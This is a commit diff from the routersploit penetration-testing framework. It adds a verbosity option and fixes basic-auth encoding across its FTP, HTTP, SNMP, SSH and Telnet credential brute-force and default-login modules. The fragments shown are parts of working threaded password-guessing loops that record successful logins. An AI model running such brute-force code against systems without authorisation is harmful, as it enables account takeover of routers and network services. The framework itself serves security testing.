Skip to content

R
routersploit
Commit 7d5e78cd by Marcin Bury
Options

Adding verbosity level to creds modules. Fixing encoding problem with basic auth.

parent ba3ffc4f
Showing with 92 additions and 63 deletions
routersploit/modules/creds/ftp_bruteforce.py
......@@ -11,6 +11,7 @@ from routersploit import (
LockedIterator,
print_success,
print_table,
boolify,
)
......@@ -32,6 +33,7 @@ class Exploit(exploits.Exploit):
threads = exploits.Option(8, 'Number of threads')
usernames = exploits.Option('admin', 'Username or file with usernames (file://)')
passwords = exploits.Option(wordlists.passwords, 'Password or file with passwords (file://)')
verbosity = exploits.Option('yes', 'Display authentication attempts')
credentials = []
......@@ -70,9 +72,10 @@ class Exploit(exploits.Exploit):
print_error("Credentials not found")
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
print_status(name, 'process is starting...')
print_status(name, 'process is starting...', verbose=module_verbosity)
ftp = ftplib.FTP()
while running.is_set():
......@@ -89,22 +92,22 @@ class Exploit(exploits.Exploit):
ftp.connect(self.target, port=int(self.port), timeout=10)
break
except socket.error, socket.timeout:
print_error("{} Connection problem. Retrying...".format(name))
print_error("{} Connection problem. Retrying...".format(name), verbose=module_verbosity)
retries += 1
if retries > 2:
print_error("Too much connection problems. Quiting...")
print_error("Too much connection problems. Quiting...", verbose=module_verbosity)
return
try:
ftp.login(user, password)
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password)
print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
self.credentials.append((user, password))
except:
print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password))
print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
ftp.close()
print_status(name, 'process is terminated.')
print_status(name, 'process is terminated.', verbose=module_verbosity)
routersploit/modules/creds/ftp_default.py
......@@ -10,6 +10,7 @@ from routersploit import (
LockedIterator,
print_success,
print_table,
boolify,
)
......@@ -30,6 +31,7 @@ class Exploit(exploits.Exploit):
threads = exploits.Option(8, 'Numbers of threads')
defaults = exploits.Option(wordlists.defaults, 'User:Pass pair or file with default credentials (file://)')
verbosity = exploits.Option('yes', 'Display authentication attempts')
credentials = []
......@@ -62,9 +64,10 @@ class Exploit(exploits.Exploit):
print_error("Credentials not found")
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
print_status(name, 'process is starting...')
print_status(name, 'process is starting...', verbose=module_verbosity)
ftp = ftplib.FTP()
while running.is_set():
......@@ -81,22 +84,22 @@ class Exploit(exploits.Exploit):
ftp.connect(self.target, port=int(self.port), timeout=10)
break
except:
print_error("{} Connection problem. Retrying...".format(name))
print_error("{} Connection problem. Retrying...".format(name), verbose=module_verbosity)
retries += 1
if retries > 2:
print_error("Too much connection problems. Quiting...")
print_error("Too much connection problems. Quiting...", verbose=module_verbosity)
return
try:
ftp.login(user, password)
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password)
print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
self.credentials.append((user, password))
except:
print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password))
print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
ftp.close()
print_status(name, 'process is terminated.')
print_status(name, 'process is terminated.', verbose=module_verbosity)
routersploit/modules/creds/http_basic_bruteforce.py
......@@ -11,6 +11,7 @@ from routersploit import (
print_success,
print_table,
sanitize_url,
boolify,
)
......@@ -33,6 +34,7 @@ class Exploit(exploits.Exploit):
usernames = exploits.Option('admin', 'Username or file with usernames (file://)')
passwords = exploits.Option(wordlists.passwords, 'Password or file with passwords (file://)')
path = exploits.Option('/', 'URL Path')
verbosity = exploits.Option('yes', 'Display authentication attempts')
credentials = []
......@@ -75,25 +77,26 @@ class Exploit(exploits.Exploit):
print_error("Credentials not found")
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
print_status(name, 'process is starting...')
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
user, password = data.next()
user = user.strip()
password = password.strip()
user = user.encode('utf-8').strip()
password = password.encode('utf-8').strip()
r = requests.get(url, auth=(user, password))
if r.status_code != 401:
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password)
print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
self.credentials.append((user, password))
else:
print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password))
print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'process is terminated.')
print_status(name, 'process is terminated.', verbose=module_verbosity)
routersploit/modules/creds/http_basic_default.py
......@@ -10,6 +10,7 @@ from routersploit import (
print_success,
print_table,
sanitize_url,
boolify,
)
......@@ -30,6 +31,7 @@ class Exploit(exploits.Exploit):
threads = exploits.Option(8, 'Number of threads')
defaults = exploits.Option(wordlists.defaults, 'User:Pass or file with default credentials (file://)')
path = exploits.Option('/', 'URL Path')
verbosity = exploits.Option('yes', 'Display authentication attempts')
credentials = []
......@@ -66,25 +68,26 @@ class Exploit(exploits.Exploit):
print_error("Credentials not found")
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
print_status(name, 'process is starting...')
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
line = data.next().split(":")
user = line[0].strip()
password = line[1].strip()
user = line[0].encode('utf-8').strip()
password = line[1].encode('utf-8').strip()
r = requests.get(url, auth=(user, password))
if r.status_code != 401:
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password)
print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
self.credentials.append((user, password))
else:
print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password))
print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'process is terminated.')
print_status(name, 'process is terminated.', verbose=module_verbosity)
routersploit/modules/creds/http_form_bruteforce.py
......@@ -12,6 +12,7 @@ from routersploit import (
print_success,
print_table,
sanitize_url,
boolify,
)
......@@ -34,6 +35,7 @@ class Exploit(exploits.Exploit):
passwords = exploits.Option(wordlists.passwords, 'Password or file with passwords (file://)')
form = exploits.Option('auto', 'Post Data: auto or in form login={{LOGIN}}&password={{PASS}}&submit')
path = exploits.Option('/login.php', 'URL Path')
verbosity = exploits.Option('yes', 'Display authentication attempts')
credentials = []
data = ""
......@@ -134,11 +136,12 @@ class Exploit(exploits.Exploit):
return '&'.join(res)
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
print_status(name, 'process is starting...')
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
......@@ -152,11 +155,11 @@ class Exploit(exploits.Exploit):
if l < self.invalid["min"] or l > self.invalid["max"]:
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password)
print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
self.credentials.append((user, password))
else:
print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password))
print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'process is terminated.')
print_status(name, 'process is terminated.', verbose=module_verbosity)
routersploit/modules/creds/http_form_default.py
......@@ -11,6 +11,7 @@ from routersploit import (
print_success,
print_table,
sanitize_url,
boolify,
)
......@@ -32,6 +33,7 @@ class Exploit(exploits.Exploit):
defaults = exploits.Option(wordlists.defaults, 'User:Pass or file with default credentials (file://)')
form = exploits.Option('auto', 'Post Data: auto or in form login={{LOGIN}}&password={{PASS}}&submit')
path = exploits.Option('/login.php', 'URL Path')
verbosity = exploits.Option('yes', 'Display authentication attempts')
credentials = []
data = ""
......@@ -127,11 +129,12 @@ class Exploit(exploits.Exploit):
return '&'.join(res)
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
print_status(name, 'process is starting...')
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
......@@ -145,11 +148,11 @@ class Exploit(exploits.Exploit):
if l < self.invalid["min"] or l > self.invalid["max"]:
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password)
print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
self.credentials.append((user, password))
else:
print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password))
print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'process is terminated.')
print_status(name, 'process is terminated.', verbose=module_verbosity)
routersploit/modules/creds/snmp_bruteforce.py
import threading
import netsnmp
from routersploit.utils import print_status, print_success, print_error, print_table, LockedIterator
from routersploit import exploits
from routersploit import wordlists
from routersploit import (
exploits,
wordlists,
print_status,
print_error,
LockedIterator,
print_success,
print_table,
boolify,
)
class Exploit(exploits.Exploit):
......@@ -20,6 +27,7 @@ class Exploit(exploits.Exploit):
port = exploits.Option(161, 'Target port')
threads = exploits.Option(8, 'Number of threads')
snmp = exploits.Option(wordlists.snmp, 'Community string or file with community strings (file://)')
verbosity = exploits.Option('yes', 'Display authentication attempts')
strings = []
......@@ -44,10 +52,11 @@ class Exploit(exploits.Exploit):
print_error("Valid community strings not found")
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
address = "{}:{}".format(self.target, self.port)
print_status(name, 'thread is starting...')
print_status(name, 'thread is starting...', verbose=module_verbosity)
while running.is_set():
try:
......@@ -58,12 +67,12 @@ class Exploit(exploits.Exploit):
if res[0] is not None:
running.clear()
print_success("{}: Valid community string found!".format(name), string)
print_success("{}: Valid community string found!".format(name), string, verbose=module_verbosity)
self.strings.append(tuple([string]))
else:
print_error("{}: Invalid community string.".format(name), string)
print_error("{}: Invalid community string.".format(name), string, verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'thread is terminated.')
print_status(name, 'thread is terminated.', verbose=module_verbosity)
routersploit/modules/creds/ssh_bruteforce.py
......@@ -31,7 +31,7 @@ class Exploit(exploits.Exploit):
threads = exploits.Option(8, 'Number of threads')
usernames = exploits.Option('admin', 'Username or file with usernames (file://)')
passwords = exploits.Option(wordlists.passwords, 'Password or file with passwords (file://)')
verbosity = exploits.Option(True, 'Display authentication attempts')
verbosity = exploits.Option('yes', 'Display authentication attempts')
credentials = []
......@@ -88,7 +88,7 @@ class Exploit(exploits.Exploit):
break
except paramiko.ssh_exception.SSHException as err:
ssh.close()
print_error(name, err, user, password, verbose=module_verbosity)
print_error(name, err, "Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
else:
running.clear()
......
routersploit/modules/creds/ssh_default.py
......@@ -10,6 +10,7 @@ from routersploit import (
LockedIterator,
print_success,
print_table,
boolify,
)
......@@ -32,7 +33,6 @@ class Exploit(exploits.Exploit):
verbosity = exploits.Option('yes', 'Display authentication attempts')
credentials = []
verb = None
def run(self):
self.credentials = []
......@@ -54,7 +54,6 @@ class Exploit(exploits.Exploit):
else:
defaults = [self.defaults]
self.verb = self.verbosity.lower()
collection = LockedIterator(defaults)
self.run_threads(self.threads, self.target_function, collection)
......@@ -66,12 +65,12 @@ class Exploit(exploits.Exploit):
print_error("Credentials not found")
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
if self.verb == 'yes':
print_status(name, 'process is starting...')
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
......@@ -84,15 +83,12 @@ class Exploit(exploits.Exploit):
except paramiko.ssh_exception.SSHException as err:
ssh.close()
if self.verb == 'yes':
print_error(name, err, "Username: '{}' Password: '{}'".format(user, password))
print_error(name, err, "Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
else:
running.clear()
if self.verb == 'yes':
print_success("{}: Authentication succeed!".format(name), user, password)
print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
self.credentials.append((user, password))
if self.verb == 'yes':
print_status(name, 'process is terminated.')
print_status(name, 'process is terminated.', verbose=module_verbosity)
routersploit/modules/creds/telnet_bruteforce.py
......@@ -10,6 +10,7 @@ from routersploit import (
LockedIterator,
print_success,
print_table,
boolify,
)
......@@ -29,6 +30,7 @@ class Exploit(exploits.Exploit):
threads = exploits.Option(8, 'Number of threads')
usernames = exploits.Option('admin', 'Username or file with usernames (file://)')
passwords = exploits.Option(wordlists.passwords, 'Password or file with passwords (file://)')
verbosity = exploits.Option('yes', 'Display authentication attempts')
credentials = []
......@@ -64,9 +66,10 @@ class Exploit(exploits.Exploit):
print_error("Credentials not found")
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
print_status(name, 'thread is starting...')
print_status(name, 'thread is starting...', verbose=module_verbosity)
while running.is_set():
try:
......@@ -90,21 +93,21 @@ class Exploit(exploits.Exploit):
tn.close()
if i != -1:
print_error(name, "Username: '{}' Password: '{}'".format(user, password))
print_error(name, "Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
else:
if any(map(lambda x: x in res, ["#", "$", ">"])) or len(res) > 500: # big banner e.g. mikrotik
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password)
print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
self.credentials.append((user, password))
tn.close()
break
except EOFError:
print_error(name, "Connection problem. Retrying...")
print_error(name, "Connection problem. Retrying...", verbose=module_verbosity)
retries += 1
if retries > 2:
print_error("Too much connection problems. Quiting...")
print_error("Too much connection problems. Quiting...", verbose=module_verbosity)
return
continue
print_status(name, 'thread is terminated.')
print_status(name, 'thread is terminated.', verbose=module_verbosity)
routersploit/modules/creds/telnet_default.py
......@@ -9,6 +9,7 @@ from routersploit import (
LockedIterator,
print_success,
print_table,
boolify,
)
......@@ -29,6 +30,7 @@ class Exploit(exploits.Exploit):
threads = exploits.Option(8, 'Numbers of threads')
defaults = exploits.Option(wordlists.defaults, 'User:Pass or file with default credentials (file://)')
verbosity = exploits.Option('yes', 'Display authentication attempts')
credentials = []
......@@ -59,8 +61,9 @@ class Exploit(exploits.Exploit):
print_error("Credentials not found")
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
print_status(name, 'process is starting...')
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
......@@ -84,21 +87,21 @@ class Exploit(exploits.Exploit):
tn.close()
if i != -1:
print_error(name, "Username: '{}' Password: '{}'".format(user, password))
print_error(name, "Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
else:
if any(map(lambda x: x in res, ["#", "$", ">"])) or len(res) > 500: # big banner e.g. mikrotik
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password)
print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
self.credentials.append((user, password))
tn.close()
break
except EOFError:
print_error(name, "Connection problem. Retrying...")
print_error(name, "Connection problem. Retrying...", verbose=module_verbosity)
retries += 1
if retries > 2:
print_error("Too much connection problems. Quiting...")
print_error("Too much connection problems. Quiting...", verbose=module_verbosity)
return
continue
print_status(name, 'process is terminated.')
print_status(name, 'process is terminated.', verbose=module_verbosity)
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment